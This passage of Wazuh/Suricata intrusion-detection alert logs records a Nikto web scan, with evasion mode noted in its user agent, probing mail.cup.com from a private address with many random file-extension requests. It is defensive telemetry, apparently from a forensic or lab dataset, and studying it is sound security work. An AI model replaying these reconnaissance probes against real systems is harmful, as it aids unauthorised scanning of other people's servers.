non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.render_warning_screen","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.390615+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":20,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.35277","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.390615+0000\",\"flow_id\":769894346584834,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46976,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.phtml\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.390615+0000","flow_id":"769894346584834.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46976","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.phtml","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.393834+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":21,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.36817","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.393834+0000\",\"flow_id\":1990996498513606,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46978,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.bin\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.393834+0000","flow_id":"1990996498513606.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46978","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.bin","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.396042+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":22,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.38355","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.396042+0000\",\"flow_id\":1431362259781643,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46980,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.dat\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.396042+0000","flow_id":"1431362259781643.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46980","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.dat","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.399022+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":23,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.39893","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.399022+0000\",\"flow_id\":2013892969108308,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46982,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.dbm\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.399022+0000","flow_id":"2013892969108308.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46982","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.dbm","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.401306+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":24,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.41431","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.401306+0000\",\"flow_id\":1806467523550245,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46984,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.html\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.401306+0000","flow_id":"1806467523550245.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46984","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.html","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.403790+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":25,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.42971","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.403790+0000\",\"flow_id\":1045261879748187,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46986,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.thtml\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.403790+0000","flow_id":"1045261879748187.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46986","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.thtml","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.406521+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":26,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.44513","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.406521+0000\",\"flow_id\":2137592322207186,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46988,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.AP\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.406521+0000","flow_id":"2137592322207186.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46988","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.AP","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.408739+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":27,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.46049","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.408739+0000\",\"flow_id\":491335652620395,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46990,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.cp-1251\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.408739+0000","flow_id":"491335652620395.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46990","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.cp-1251","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.411490+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":28,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.47593","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.411490+0000\",\"flow_id\":418346978395032,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46992,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.blt\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.411490+0000","flow_id":"418346978395032.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46992","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.blt","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.414228+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":29,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.49129","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.414228+0000\",\"flow_id\":984986308726290,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46994,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/.bISn4adA\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.414228+0000","flow_id":"984986308726290.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46994","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/.bISn4adA","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.416379+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":30,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.50659","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.416379+0000\",\"flow_id\":1450801281783779,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46996,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.show_query_columns\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.416379+0000","flow_id":"1450801281783779.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46996","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.show_query_columns","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.418630+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":31,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.52227","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.418630+0000\",\"flow_id\":391417533456539,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46998,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.dtd\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.418630+0000","flow_id":"391417533456539.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46998","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.dtd","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.429055+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":32,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.53763","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.429055+0000\",\"flow_id\":1722213150132363,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47002,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.htm\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.429055+0000","flow_id":"1722213150132363.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47002","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.htm","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.420714+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":33,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.55301","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.420714+0000\",\"flow_id\":1.80732651702906e+15,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47000,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.shtm\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.420714+0000","flow_id":"1807326517029060.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47000","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.shtm","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.434021+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":34,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.56845","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.434021+0000\",\"flow_id\":243292701366920,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47004,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.it\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.434021+0000","flow_id":"243292701366920.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47004","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.it","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.439682+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":35,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.58379","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.439682+0000\",\"flow_id\":1495318617829748,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47006,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.INC\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 